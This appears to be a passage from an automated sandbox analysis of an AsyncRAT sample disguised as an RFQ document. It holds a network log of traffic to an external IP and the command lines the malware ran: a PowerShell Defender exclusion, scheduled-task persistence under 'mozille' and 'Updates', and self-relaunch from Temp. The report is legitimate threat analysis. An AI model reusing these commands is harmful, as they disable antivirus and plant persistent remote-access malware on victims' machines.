                                                                    Jan 12, 2022 09:03:00.102216005 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.102407932 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.186480045 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.214020014 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.214072943 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.214178085 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.214235067 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.214301109 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.214421034 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.214526892 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.214653015 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.214716911 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.214730024 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.214761019 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.214816093 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.214878082 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.214930058 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.215234995 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.215276957 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.215332031 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.215343952 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.259789944 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.259836912 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.259870052 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.259953976 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.260010004 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.260153055 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.260195017 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.260274887 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.260284901 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.260289907 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.260334015 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.260406017 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.260742903 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.260812044 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.260821104 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.260854959 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.260896921 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.260967970 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.261008978 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.261054993 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.261069059 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.261122942 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.261926889 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.261967897 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.262006044 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.262046099 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.262058973 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.262070894 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.262084961 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.262125015 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.262162924 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.262254953 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.262294054 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.305532932 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.305582047 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.305623055 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.305937052 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.305977106 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.306015015 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.306015968 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.306046009 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.306154013 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.306221962 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.306531906 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.306648016 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.306689024 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.306726933 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.306740999 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.306752920 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.306766987 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.306808949 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.306904078 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.307087898 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.307127953 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.307163954 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.307348967 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.307390928 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.307512045 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.307553053 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:03:00.307563066 CET497205512192.168.2.389.238.150.43

                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Start time:09:02:00
                                                                    Start date:12/01/2022
                                                                    Path:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe"
                                                                    Imagebase:0x390000
                                                                    File size:567808 bytes
                                                                    MD5 hash:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:09:02:10
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                                                                    Imagebase:0x50000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:11
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7f20f0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:11
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp
                                                                    Imagebase:0x1010000
                                                                    File size:185856 bytes
                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:13
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7f20f0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:13
                                                                    Start date:12/01/2022
                                                                    Path:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    Imagebase:0x160000
                                                                    File size:567808 bytes
                                                                    MD5 hash:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low

                                                                    General

                                                                    Start time:09:02:16
                                                                    Start date:12/01/2022
                                                                    Path:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    Imagebase:0x580000
                                                                    File size:567808 bytes
                                                                    MD5 hash:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000000.335571895.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000000.335001041.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.359864523.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000000.334452217.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000000.333878908.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:09:02:29
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' & exit
                                                                    Imagebase:0xd80000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:29
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7f20f0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:29
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat""
                                                                    Imagebase:0xd80000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:30
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"'
                                                                    Imagebase:0x1010000
                                                                    File size:185856 bytes
                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:30
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7f20f0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:09:02:31
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout 3
                                                                    Imagebase:0x320000
                                                                    File size:26112 bytes
                                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:09:02:31
                                                                    Start date:12/01/2022
                                                                    Path:C:\Users\user\AppData\Local\Temp\mozille.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\mozille.exe
                                                                    Imagebase:0x260000
                                                                    File size:567808 bytes
                                                                    MD5 hash:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:09:02:36
                                                                    Start date:12/01/2022
                                                                    Path:C:\Users\user\AppData\Local\Temp\mozille.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\mozille.exe"
                                                                    Imagebase:0xf10000
                                                                    File size:567808 bytes
                                                                    MD5 hash:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:09:02:38
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                                                                    Imagebase:0x50000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET

                                                                    General

                                                                    Start time:09:02:39
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7f20f0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:09:02:39
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmpCDE7.tmp
                                                                    Imagebase:0x1010000
                                                                    File size:185856 bytes
                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:09:02:40
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                                                                    Imagebase:0x2d0000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >